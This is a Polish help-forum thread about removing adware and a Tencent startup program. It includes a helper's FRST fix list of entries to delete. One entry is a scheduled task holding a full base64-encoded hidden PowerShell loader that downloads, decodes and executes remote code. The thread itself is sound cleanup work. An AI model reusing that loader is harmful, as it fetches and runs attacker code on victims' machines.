Zawirusowany komputer, chiński program w starcie

Chmury · 22 Stycznia 2016

Witam.

Krótko i zwięźle, podczas ściągania jakiegoś programu zastałem komputer w stanie zawirusowania, przy włączaniu komputera włącza się program pod jakąś chińską nazwą proszący o dostęp do konta komputera. Prosiłbym o pomoc ponieważ sam niestety nie dam rady.

Logi z FRST.

FRST.txt

Addition.txt

Shortcut.txt

picasso · 4 Lutego 2016

Ów chiński obiekt w starcie to Tencent, ale to nie jest jedyny problem w systemie, dużo innych obiektów adware. Działania do przeprowadzenia:

1. Otwórz Notatnik i wklej w nim:

CloseProcesses:
CreateRestorePoint:
R2 Airtostrong; C:\ProgramData\\Airtostrong\\Airtostrong.exe [540160 2016-01-22] () [brak podpisu cyfrowego]
R2 aotech; C:\Program Files\aotech\aotech.exe [383488 2016-01-22] () [brak podpisu cyfrowego]
HKLM-x32\...\Run: [pcmgr] => C:\Program Files (x86)\ppt\Uninst.exe [1571296 2015-12-28] (Tencent)
AppInit_DLLs: C:\ProgramData\Airtostrong\Lacof.dll => C:\ProgramData\Airtostrong\Lacof.dll [805376 2016-01-22] ()
AppInit_DLLs-x32: C:\ProgramData\Airtostrong\Physsoft.dll => C:\ProgramData\Airtostrong\Physsoft.dll [257536 2016-01-22] ()
Task: {007A3879-EAB9-4943-B2FB-7E8706926C49} - System32\Tasks\{0E0D7A47-0C0A-7E0E-0D11-0D7A790B117A} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFYAZQByAGIAbwBzAGUAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsAJABEAGUAYgB1AGcAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsACgBmAHUAbgBjAHQAaQBvAG4AIABzAHIAKAAkAHAAKQB7ACQAbgA9ACIAVwBpAG4AZABvAHcAUABvAHMAaQB0AGkAbwBuACIAOwB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAcAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0AYwBhAHQAYwBoAHsAfQB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAARABXAE8AUgBEACAALQBWAGEAbAB1AGUAIAAyADAAMQAzADIAOQA2ADYANAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0ACgBjAGEAdABjAGgAewB0AHIAeQB7AFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFYAYQBsAHUAZQAgADIAMAAxADMAMgA5ADYANgA0AHwATwB1AHQALQBOAHUAbABsADsAfQBjAGEAdABjAGgAewB9AH0AfQBzAHIAKAAiAEgASwBDAFUAOgBcAEMAbwBuAHMAbwBsAGUAXAAlAFMAeQBzAHQAZQBtAFIAbwBvAHQAJQBfAFMAeQBzAHQAZQBtADMAMgBfAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABfAHYAMQAuADAAXwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAJQBTAHkAcwB0AGUAbQBSAG8AbwB0ACUAXwBTAHkAcwB0AGUAbQAzADIAXwBzAHYAYwBoAG8AcwB0AC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAdABhAHMAawBlAG4AZwAuAGUAeABlACIAKQA7AAoAJABzAHUAcgBsAD0AIgBoAHQAdABwADoALwAvAGYAbwByAGEAbABsAHMAaABvAHAALgBpAG4AZgBvAC8AdQAvAD8AYQA9AHIAbwBsAGIAbAA5AEwAdgBUAEUAZgBFAE4AZQBKAGEAeQA2AEwAYQBqAGcAMQBaADkAQQBhAG8ALQBLAHQAagBGAF8ATwBPAEQAYgBSADcAUABOAEEAZwBmAHMATQBwAEEARwBJAGEANwBZAGIASABMAFkAeQBWADQATQBVAEQAYgA0ADkAUgBPAC0AMgBqAEkARwAxAEEAbABhAGYAdwBZAHIAdgBGAEwARgBlAGIAOAB2AEcATwBRAFQATgB6AGYAeQBlAFkAVQByAGYAawBuAHUAaQBXAEEAawBIAGEAXwAyADEASABnAE4ASQBJAFQASgBIADcASABsAHcAYgBkAE0AcABsADMAbwA1AEMANQBVAGgATABrADkARQBkAHIANABZAFYAegBNAEwAQQAtAEgAZQBxAG8AawA3AE4AQgBLAEUAQwBtAHQANABwAGIARgBSAG4AYgBQAGsAWAAyAFQAWABaAG0ASwBDAGsAYgBuAEEAdABBAFUAQgBkAFUAWAB5AEQAYgA4ADEAWgBtAGUATQA2AFUAQQAyAFkAZwBIAFgATABqAHgASgAxADgANgBsADkARwBVAGoAUQBvAGYATwBpAHIAbwAtAG4ANABIAGgAQgBkAGgARgByAHIAZQBzAGsAQgBqAEgAWABPADkAaQBNAEEAZABUAGsAMwBaAHUAYgBIAEYAcgBaADUAMQBYAGUASwBMADQAaAA1AFAAZABoAEQARwBRAGcASgBQAFUAVABzAHAATQBBAGEAdQBiAG0ATwBOAFoAZgBSAHoAdgBNAGcAOQBfAGMAZgBCADYARwBOAFEAUwBTAGgAOABzAFMANABSAGkAZgByAHkAOABFAHEAbgBIAGsASwAwADEASwBJAGcARgBFAFMANwBiAGIAZQBiAEgANwBGAEYAZAAwAEIAMQA5AGkAbgBOAGgAaAAyAEgAXwBKAEgAbABNAFIAOQA4AFAAcwBTAFUAWgBRAHkAcgBRAFMAZQBwAE0AOQBtAFkAaQBPAG0AVAB5AFYAagBIAFMAVwB1ADIAegBVAEEAQQB0AGQARgBpAHMAawBPADUATQBnADUASgB3AHQAUgA2AF8AZABYAGgALQA3AGUASQBZAFYAWABTAEUATABkAHcARABPAFcAdABHAEUASABJAHAAYwBiADMAagBCAFcARQA0ADEAZQBZAGgAXwB0AEYAdwA2AEQAdwBUADgAVwBZAHAAUQBkADMAZwB6AFIASABKADYAYQB2AGcAMgBSAHkATQBXAEEATQBoADEANgBtAGQAaABOAGYASwB0AFMAZQBaAGUAUQBYADQAUQByADYAZgBTAFQAbQB3AHEAOABGAE0ATABHADYAWABBAEEASgAtADkAMgBsAHEAbwA0AEYAZABtAHAAZQBvAE4AYQBYADIATABfAFMAZABSAEsAegBTAHgAZwBKADkAMgA3ADQAWgAwAFEALQBkAGQAMABXAFgAcgBJAHgATAAxAGwAdwA0AE4ASAB6ADcAegBMADIAaAA2AEIAegBxAGcARQBBADUAeQAwAFEAOQBHAE4ARgBxAE4AQwBKAEgANABtAGMAZABrAFAAYgBDAGIAYQB0AHgASQBTAGIAVQBmAGQAaQBMAHEAYQBkAGgAYwB2AFgAOQBpADIANgBaAG4AcAA4AGUAZgAxAEgAbQAzAG8ARQBCAC0ASQBIAEUASQB3ADYAVQAzAEEARQBCAGsAOABvAFkAWQBMADUALQBvAGMAVwB2ADEAaQB0ADIAbABhAFQANABkAHMAVwBtAFkAUwBTAEkAOQA2AEIAWgBGAE8AcABqAHMAcQBaAFUAcQA3AEgAUQBLAE0AZwBYAEsAbQBEAFcAZwBYAHIAUwBtAFYASQA3AEMAWgBkADUAZQBWAFQAeABJADkAZQB6AHYAWQBNAHcAZgAxAEYASQA5AHoAWgAzAEYAaAA5ADQAYQBnAHYAMwBwAGIAZgBuADEATQBKAGEAYgB6AGUAWgB2AEIANgAyAHUAVgB0ADgAZQBFADIAUABPAHoAZABvAFEAZABPAHQASgBuAC0AQgBlAFEATQAyAGcAQgAtAGUATgBTAHQAQQBOAFYAaAB6AE8ASQB4ADIARwByAGIAYgBuAHMAbABTAE4AdQB4AF8AUABXAHMASgBWAGkAYwBIADgARwB4AHEAMQBHAHMAVwBBAEoAdgBUAEUAWAB3AG8AVQBTAE8AdgBaAHEAQwBpAFUAWABVADAARABaAFEAcgBDADQARQA3AEwAMgBTAGUAeQBPAGsAdwBCAEsAcgBKADgATQA4AHEAYQBRAGgATABrAE8ANgBEAFkAMQAyAGcAbwBrAG8ANQBuAEYAMABhAFYAcgAyAFMAdwBqAFEAJgBjAD0AQgBqAGEARQBIADUASQA1AHEAVAA4AE8AWQBfAFMAawBuADMARABUAE8ARABWADgATwBXADcAMgA3AHMASgBkAHIAYgB1AHUAQwBWAGkAZwB1AC0AeQBuAEIAXwBUAHkARgBMAGMARQB2AEEAaQAtAE8AagB0AEIANgBZAHkAYwB4AHoAbwBSAFEAQQBaAEsARgBZADcAQgBIAGwAcgBaAFMAdABfAFAAdgA4AFoAMABWAFoAdABOAEsAcAA1AGQATQBQADYASwA5AHYAOAByAGgAZwBGAEEATABiAHUANwBtADUAbABLAHcAcABEAEoAbQBFAFEAVgBKAGcAZABzAHEASQAxADkAagBQAHAAbwB0AFkAaABhAHYAOQAwAEkAdwBQAEMAYgBXAGQAZABxAE0AYwB2AGkAYgBSAE8AbgBrAEgANwBaAGkAbwBEAHEASQBSAGMAVgBZAG8AWgBRAEkAZwBaAEIAcABIAGoAUQBPAE8ANABaAFEAbQA2ADAAWgAwAHkATABnAEEALQBHAG0AWQBZAEoAZgB6AEwAawBrAEoAaQBpADcAZwB0AGUAUAB6AHIARwBaADgAbwBoAHoAawBJAFYAaQBxAHoAUgBQAGEATwBIADcAcwBQAHcAMwBhAGwAXwB2AEEATgB0AEkAQgA5AG0ASgBnAHQAcAAxAHoAWQAtAFgASgBTAE0AbwBIAEcATwBLAEEAbQB0AFMAaABkAGQAawBMAHcAbwBaAEQAaABOAHgAUgAxAGEANwAxAEUAcwBvADMAOABJAFMASwBKAGIAMgBxAGcAVAB1AEQATgBoAFoAawBBAHUAaQBOAEUAeQBsADUAYwBfAFAAawBmADQAUQBNADEASQA5AEsATAB1AHcARQBtAGEAbgBJADcAYQBSAE8AMgByAGwAagBsAFYAdQAwADEAQgB2ADIAcgBQAHcAWgBKAEYARwBVAGoANgA0AEkARABNADYAMwB5AC0AXwB0AEIAdwB5ADUALQBKAHgAYgBDAEQAVABxAGQAVQBIAC0ARwBuADYAbgBOAE8AbQBoAEIASgB4AE4AaQByAEcARwBEADgANABBAEsANwAzADEAVABMAEcANQBuAHIAagBLAG0AUABFADIAdQAwAHQAMABHAGwAMQBnAFkAMQBOADgAXwBNADUAQwBhAFQATwBoAGUAOAAtAGwAYgB4AHMAVAB6AFoAbwBNAFkAdgAyADIAMwBVAGsAdwAyAFcAZQB2AG4AUQAxAHUAMgAwAEMAcgBoAGsAdAB1AHgAXwBvAHQAMgBiAHEANABVAG0AMgBQAFEAaQBxAHkAeQBtAHAAVgBsAHUAWgBKADMAZgBBADYAbQBwAEwAeABUADkAeQBjAGQASABhAFUAWgBfAG4ANABjAHAAZABIAHEASABfAEMAZgBfADMAawBoAGsAQQB6AHYAbgBfAGIAVABoADQASQBvAEMAaAA5AEYAMgBDAFoARwBxAFUAUgBWAG8ATQBrAFUAWQBRAE8ATwBiAEMARgBBAF8ARABaADQAaAA1AFcANgBhAGMAcABWAHAAcwBvAEkAVgB1AG8AVABIADgAZABMAEQAZQBoAGcAcQAzAE4AUwBlAEgAZgBEADQAVAAxAG0AeQBNADkARwBIAFMAOAB4AC0AeABqAFUAVwBEADQAMwBEAGQAeABUAEIAXwBaAGYARQBiAHcASQBXAGUAWgBXAFQANgBvAGUAcgBfAHcAWgBQAEQANwBDADEAYQB2AFkAegBkAHIAeABOAC0AVwBYAHQASgBCAEQAMgB0AFoAUgBmAHUAWgB6ADcAYgA0AE0AbAB2AGIAMQBmAFMAcwBuAGkAcAAtAG8ANwByAEkAbQA2AFAAZgBzAFcAVgBTAHQAeAAyAEsAYwAzAEMASwBuAGEAbwAxAG4ARQBxAGYAaABHADUAYQBqADMARQB5AE8AUABtAFIAOAA3AGsAUABrAHcAcwAtAFYAbgBQAFYAYQBZAFMAUABtAEEANgBJAHEAVgBUAFUAMwBHAEQAagAyADAAeAAyAGkAdABqAHoAegAxAGUAcQBMAGMAeQA0ADMAUwBmAG0AaQB1AGMAQQBNAEYASwAyADEAZgBrAHAAWgBlAEoAdgBQAFcAbwB2AGMAYwBlAFAAVABFAE8ARABQAHcAVAA1AFYAWQBlAHEAcgA1AGoAcwBkAGwAaABEAGYAcgAtAF8AaQBjAFkAVgA3AEIARgBLAGoATABnAFAATQBtAGkASAAyAEYAUgA0ADUATABSAHcALQBMAFMAaABzADgAVAB5AHkAUwBIAE0AQQBJAG4AagB1AGgATwBQADQAUABOAFEAagBDADMAUQBFAEEAVABFAGYATgByAHAAdwBmADQAcwA0AHkARAA0AEMARwBEAEMAbwBfAGUAYgBwAGUATwAtAEcAaAA5ADMAJgByAD0AMQAyADkAMwAyADEAMAA3ADMANAA1ADEAMAAxADIANwA1ADYAMAAiADsAJABzAHQAcwBrAD0AIgB7ADAARQAwAEQANwBBADQANwAtADAAQwAwAEEALQA3AEUAMABFAC0AMABEADEAMQAtADAARAA3AEEANwA5ADAAQgAxADEANwBBAH0AIgA7ACQAcAByAGkAZAA9ACIAUwB5AHMAdABlAG0ASABlAGEAbABlAHIAIgA7ACQAaQBuAGkAZAA9ACIASABHAE8AQwBLAEYASABCACIAOwB0AHIAeQB7AGkAZgAoACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4ALgBNAGEAagBvAHIAIAAtAGwAdAAgADIAKQB7AGIAcgBlAGEAawA7AH0AJAB2AD0AWwBTAHkAcwB0AGUAbQAuAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBPAFMAVgBlAHIAcwBpAG8AbgAuAFYAZQByAHMAaQBvAG4AOwAKAGkAZgAoACQAdgAuAE0AYQBqAG8AcgAgAC0AZQBxACAANQApAHsAaQBmACgAKAAkAHYALgBNAGkAbgBvAHIAIAAtAGwAdAAgADIAKQAgAC0AQQBOAEQAIAAoACgARwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBTAGUAcgB2AGkAYwBlAFAAYQBjAGsATQBhAGoAbwByAFYAZQByAHMAaQBvAG4AIAAtAGwAdAAgADIAKQApAHsAYgByAGUAYQBrADsAfQB9AAoAaQBmACgALQBOAE8AVAAgACgAWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMAUAByAGkAbgBjAGkAcABhAGwAXQBbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBJAGQAZQBuAHQAaQB0AHkAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdAAoACkAKQAuAEkAcwBJAG4AUgBvAGwAZQAoAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAEIAdQBpAGwAdABJAG4AUgBvAGwAZQBdACAAIgBBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByACIAKQApAHsAYgByAGUAYQBrADsAfQAKAGYAdQBuAGMAdABpAG8AbgAgAHcAYwAoACQAdQByAGwAKQB7ACQAcgBxAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAcgBxAC4AVQBzAGUARABlAGYAYQB1AGwAdABDAHIAZQBkAGUAbgB0AGkAYQBsAHMAPQAkAHQAcgB1AGUAOwAkAHIAcQAuAEgAZQBhAGQAZQByAHMALgBBAGQAZAAoACIAdQBzAGUAcgAtAGEAZwBlAG4AdAAiACwAIgBNAG8AegBpAGwAbABhAC8ANAAuADAAIAAoAGMAbwBtAHAAYQB0AGkAYgBsAGUAOwAgAE0AUwBJAEUAIAA3AC4AMAA7ACAAVwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxADsAKQAiACkAOwByAGUAdAB1AHIAbgAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJAByAHEALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAdQByAGwAKQApADsAfQAKAGYAdQBuAGMAdABpAG8AbgAgAGQAcwB0AHIAKAAkAHIAYQB3AGQAYQB0AGEAKQB7ACQAYgB0AD0AWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAHIAYQB3AGQAYQB0AGEAKQA7ACQAZQB4AHQAPQAkAGIAdABbADAAXQA7ACQAawBlAHkAPQAkAGIAdABbADEAXQAgAC0AYgB4AG8AcgAgADEANwAwADsAZgBvAHIAKAAkAGkAPQAyADsAJABpACAALQBsAHQAIAAkAGIAdAAuAEwAZQBuAGcAdABoADsAJABpACsAKwApAHsAJABiAHQAWwAkAGkAXQA9ACgAJABiAHQAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACgAKAAkAGsAZQB5ACAAKwAgACQAaQApACAALQBiAGEAbgBkACAAMgA1ADUAKQApADsAfQAKAHIAZQB0AHUAcgBuACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEQAZQBmAGwAYQB0AGUAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAoACQAYgB0ACwAMgAsACgAJABiAHQALgBMAGUAbgBnAHQAaAAtACQAZQB4AHQAKQApACkALABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAOwB9AAoAJABzAGMAPQBkAHMAdAByACgAdwBjACgAJABzAHUAcgBsACkAKQA7AEkAbgB2AG8AawBlAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAgAC0AYwBvAG0AbQBhAG4AZAAgACIAJABzAGMAIgA7AH0AYwBhAHQAYwBoAHsAfQA7AGUAeABpAHQAIAAwADsA
Task: {033D7092-DE1C-4454-89AA-05A8083DE391} - System32\Tasks\{8E1133A2-01F8-4C42-A469-ACE6E7289288} => D:\Program Files (x86)\Origin Games\The Sims 2 Ultimate Collection\Fun with Pets\SP9\TSBin\Sims2EP9.exe
Task: {052D957C-7E11-484F-B4F5-8B8C8E33F91B} - System32\Tasks\{78DE3BA1-3E3E-4E4F-B9E2-074B0F2AB339} => D:\Błażeja\Train Simulator 2014\Train Simulator 2014\RailWorks.exe
Task: {0F293F1A-D194-4867-884A-69C59320430E} - System32\Tasks\{EAC553F1-D08B-4925-A3BA-BCC809D59478} => pcalua.exe -a C:\Users\user\Downloads\LeagueofLegends_EUNE_Installer_9_15_2014.exe -d C:\Windows\SysWOW64 -c /groupsextract:100;101;102; /out:"C:\Users\user\AppData\Roaming\Riot Games\League of Legends\prerequisites" /callbackid:3600
Task: {0FD9D867-2DCB-45DE-B381-5EE9D74B70CC} - System32\Tasks\{02CF3B8C-FC72-41D4-A477-B0E779055772} => pcalua.exe -a "C:\Program Files (x86)\Common Files\Nero\Nero ProductInstaller 4\SetupX.exe" -c REMOVESERIALNUMBER="2M0K-K085-4W59-U5LW-585P-W083-MM85-1Z8L-257X-66XA-TC3T-K1M8-3204-2A2C-5T2C-2408-4W3C-6482"
Task: {12362DC9-80F7-454D-88B5-B9AE7BF1A0D9} - System32\Tasks\{519DC9CF-B253-4BD0-B1F9-FD29076769A0} => D:\Błażeja\Train Simulator 2014\Train Simulator 2014\RailWorks.exe
Task: {18FC7AF2-23FA-421B-8D10-B8410B6D106B} - System32\Tasks\{CE59F049-6A9A-40D0-A419-101C5279A3E8} => D:\Błażeja\he\SETUP.EXE
Task: {1C9EB64E-2395-4012-A3AE-891725717DC2} - System32\Tasks\psv_Tris-Dox => /c regedit.exe /s "C:\ProgramData\Airtostrong\Singlecore.reg" & del "C:\ProgramData\Airtostrong\Singlecore.reg" & SCHTASKS /Delete /TN "psv_Tris-Dox" /F 
Task: {1DC84E54-D157-490D-AC72-F75C537E6BA4} - System32\Tasks\{49E5CEBB-0AC0-4545-8049-2DC3D607DB49} => D:\Błażeja\gierka\TIM.EXE
Task: {1F19FAB0-9744-4D28-B9D6-D70EC9C60A4B} - System32\Tasks\{00937042-8571-41D1-91B3-1BF34C315046} => D:\Błażeja\he\AUTORUN.EXE
Task: {2D4AD31C-2F75-4981-A669-D85B9CD38C9C} - System32\Tasks\Lenovo\Lenovo Customer Feedback Program 64 35 => C:\Program Files (x86)\Lenovo\Customer Feedback Program 35\Lenovo.TVT.CustomerFeedback.Agent35.exe
Task: {2FF1D73B-8B12-4451-9BF3-77F17B69B2F8} - System32\Tasks\{4078D993-C425-43E0-B6D2-F2C764BEBA6E} => D:\Błażeja\gierka\TIM.EXE
Task: {33A26768-362D-4636-A891-3C6F51CAD3A9} - System32\Tasks\{DDE0E411-176D-42DB-B937-2F1D0D525894} => D:\Błażeja\he\AUTORUN.EXE
Task: {38656597-0E88-4EA0-A313-D3CC04614FBF} - System32\Tasks\{A5653670-E66C-4620-9E53-C5083B1D3D0F} => D:\Błażeja\he\SETUP.EXE
Task: {3BBB8B2E-23DD-48E6-89C3-D2528CFEC3F4} - System32\Tasks\{716F639A-0CFA-418F-9ED1-0C89FCF2896B} => D:\Błażeja\he\SETUP.EXE
Task: {3F170444-D39E-4815-A23E-C28450A111E5} - System32\Tasks\{2B23447A-19FF-4564-80BC-69963AD32D3C} => D:\Błażeja\he\SETUP.EXE
Task: {462515AA-E6DB-4AE8-8885-9C5087262D81} - System32\Tasks\Uninstaller_SkipUac_user => C:\Program Files (x86)\IObit\IObit Uninstaller\IObitUninstaler.exe
Task: {4D59D784-CB25-4CE4-9E69-78B620DB2F8D} - System32\Tasks\{2A750497-0662-416E-8208-08F54D1BEEB0} => D:\Błażeja\he\SETUP.EXE
Task: {4DD34D73-43B0-441C-B82C-C9F291C8E22A} - System32\Tasks\{A92665E4-6694-467B-8348-43309181A29E} => D:\Błażeja\he\AUTORUN.EXE
Task: {535CAE96-43DC-4861-B6BA-A61B6185029B} - System32\Tasks\{C77AEC94-F164-4E56-B715-0D9FE27BFF2F} => pcalua.exe -a C:\Users\user\AppData\Roaming\omiga-plus\UninstallManager.exe -c -ptid=cor 
Task: {5861F754-0176-4932-8E6E-B050E9A7C35B} - System32\Tasks\{81879AD0-2A8F-483E-8444-17020348989C} => D:\Błażeja\gierka\TIM.EXE
Task: {5C970B67-F462-4D2C-A5A9-EECD5965E396} - System32\Tasks\{3DD5513E-4AF7-47A9-9966-479B510D0368} => D:\Błażeja\he\AUTORUN.EXE
Task: {610828BC-D12B-47E7-BEDF-C20AC7B0D8B6} - System32\Tasks\{8638CA79-DC3A-4F4E-8A26-E35044F64681} => D:\Błażeja\he\AUTORUN.EXE
Task: {6DA32D7C-A60D-4FC7-91B4-F1EF68C02341} - System32\Tasks\{4BE4FF64-67A0-49CB-94C5-03E755B74274} => D:\Błażeja\gierka\TIM.EXE
Task: {7580E58E-C2B4-40B7-8C7D-09A268F2A7D2} - System32\Tasks\{0F4A0214-465E-447D-9241-A288AD32BC9C} => D:\Program Files (x86)\Origin Games\The Sims 2 Ultimate Collection\Fun with Pets\SP9\TSBin\Sims2EP9.exe
Task: {7B507388-861C-4C2A-A080-D964541BAE90} - System32\Tasks\PPTAssistantNotifyTask_user => C:\Users\user\AppData\Local\PPTAssist\notify.exe
Task: {863B16B7-5E0A-48B2-B8D7-8A94A0F63627} - System32\Tasks\{5931D4C6-5DC0-4BE8-996C-FA9E0B647C66} => D:\Błażeja\gierka\TIM.EXE
Task: {8BA60223-B239-4B65-9381-2138CC8E377D} - System32\Tasks\{34D26411-AD68-43FD-A503-42E123F92315} => C:\Users\user\Downloads\D3DGearSetup.exe
Task: {8BB056F5-A2EC-47DD-9908-00465ECAB8AF} - System32\Tasks\Puukcog => C:\PROGRA~1\GROOVE~1\Fafrihn.bat
Task: {9AD398C6-4820-40AF-8730-166334D654F3} - System32\Tasks\{BF2C238E-8706-4B71-AD5F-B1151EB43B06} => D:\Błażeja\gierka\TIM.EXE
Task: {9D3F70F8-7F7C-4F8B-8507-F11BF0866D79} - System32\Tasks\{267EE13B-3EFF-4465-9B3B-CB49BF93F09F} => D:\Błażeja\gierka\TIM.EXE
Task: {9ECCC56B-6FC2-4E6A-84C3-6F0407449E56} - System32\Tasks\Game_Booster_AutoUpdate => D:\gameboster\Game Booster 3\AutoUpdate.exe
Task: {A14BF404-0C80-4360-A7A5-458313A385C8} - System32\Tasks\{DBBE9970-1FF1-4065-8083-20ED299C83AC} => D:\Błażeja\he\SETUP.EXE
Task: {A496219A-5628-4E3A-A3F7-262E0CAE63BE} - System32\Tasks\Driver Booster SkipUAC (user) => C:\Program Files (x86)\IObit\Driver Booster\DriverBooster.exe
Task: {A857AC0B-FD34-467A-B956-88CB8B1BE5B6} - System32\Tasks\{49063295-09C4-4E9D-AC83-BDEFBA180313} => D:\Błażeja\he\AUTORUN.EXE
Task: {B385E1D8-0DA3-44CA-A3D0-B92A3DFEC11A} - System32\Tasks\{CF8B4506-4BCA-4F56-86BA-32AC09EB36E7} => D:\Błażeja\gierka\TIM.EXE
Task: {C2961999-8D00-4C90-8E81-3DD57F813842} - System32\Tasks\{733EED1B-27F9-4D04-84EE-6A4959F0BB72} => D:\Błażeja\he\SETUP.EXE
Task: {CFDDF107-8609-408E-944D-80011FE0CC4C} - System32\Tasks\{5A7F4286-7082-4658-988D-19348134264C} => D:\Błażeja\he\AUTORUN.EXE
Task: {D74BA335-34EE-4381-A3A9-7D722EBAD5DE} - System32\Tasks\Trojan Killer => C:\Program Files\GridinSoft Trojan Killer\trojankiller.exe
Task: {DAC8805B-BDCF-4F34-9424-D1FD4AB9D0F9} - System32\Tasks\{5B62EAED-56C6-43FD-8FF4-2647A16BFEA3} => D:\Błażeja\he\AUTORUN.EXE
Task: {E4194451-868B-48A4-8C42-682838A8B668} - System32\Tasks\PPTAssistantUpdateTask_user => C:\Users\user\AppData\Local\PPTAssist\assistupdate.exe
Task: {EBA2728B-F677-45D8-925E-1391D2A291D9} - System32\Tasks\{649894F5-95BE-4C16-8715-E67386C75B82} => D:\Błażeja\Train Simulator 2014\Train Simulator 2014\RailWorks.exe
Task: {F60DEB4F-3306-4187-B73C-65A9155DA8CD} - \Program aktualizacji online firmy Adobe. -> Brak pliku 
Task: {F9E871FF-DBF5-4821-8487-53778FBFDEB9} - System32\Tasks\{93B98DB1-4456-4A58-9BBA-D101380B94AF} => D:\Błażeja\he\SETUP.EXE
U5 AppMgmt; C:\Windows\system32\svchost.exe [27136 2009-07-14] (Microsoft Corporation)
S3 gdrv; Brak ImagePath
S3 MBAMSwissArmy; Brak ImagePath
S3 usbbus; Brak ImagePath
S3 UsbDiag; Brak ImagePath
S3 USBModem; Brak ImagePath
S3 WinRing0_1_2_0; Brak ImagePath
S3 X6va029; Brak ImagePath
S3 XFDriver64; Brak ImagePath
S1 {991f0439-0e5b-4201-a65a-dee4d52c99b8}Gw64; Brak ImagePath
S3 catchme; \??\C:\ComboFix\catchme.sys [X]
S1 {25bfebaa-8898-4bf4-8b6f-6b7db87f40f7}Gw64; system32\drivers\{25bfebaa-8898-4bf4-8b6f-6b7db87f40f7}Gw64.sys [X]
ShellIconOverlayIdentifiers: [###MegaShellExtPending] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => Brak pliku
ShellIconOverlayIdentifiers: [###MegaShellExtSynced] -> {05B38830-F4E9-4329-978B-1DD28605D202} => Brak pliku
ShellIconOverlayIdentifiers: [###MegaShellExtSyncing] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => Brak pliku
GroupPolicy: Ograniczenia - Chrome 
CHR HKLM\SOFTWARE\Policies\Google: Ograniczenia 
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Ograniczenia 
HKU\S-1-5-21-2195696607-1004561068-2284675860-1000\SOFTWARE\Policies\Microsoft\Internet Explorer: Ograniczenia 
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/?LinkID=617911&ResetID=130878280563065191&GUID=C2693E11-1A88-4C57-AF00-A69252726DAB
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.msn.com/
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.google.com
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.google.com
